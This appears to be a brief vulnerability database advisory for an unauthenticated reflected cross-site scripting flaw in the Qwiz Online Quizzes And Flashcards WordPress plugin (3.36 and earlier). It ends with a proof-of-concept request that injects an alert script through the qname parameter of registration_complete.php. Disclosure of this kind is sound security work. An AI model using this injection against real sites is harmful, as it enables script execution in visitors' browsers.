Qwiz Online Quizzes And Flashcards <= 3.36 - Unauthenticated Reflected Cross Site Scripting

2019-09-10T00:00:00
ID WPVDB-ID:9874
Type wpvulndb
Reporter wpvulndb
Modified 2019-11-28T00:00:00

Description

WordPress Vulnerability - Qwiz Online Quizzes And Flashcards <= 3.36 - Unauthenticated Reflected Cross Site Scripting /wp-content/plugins/qwiz-online-quizzes-and-flashcards/registration_complete.php?&qname;=alert("XSS")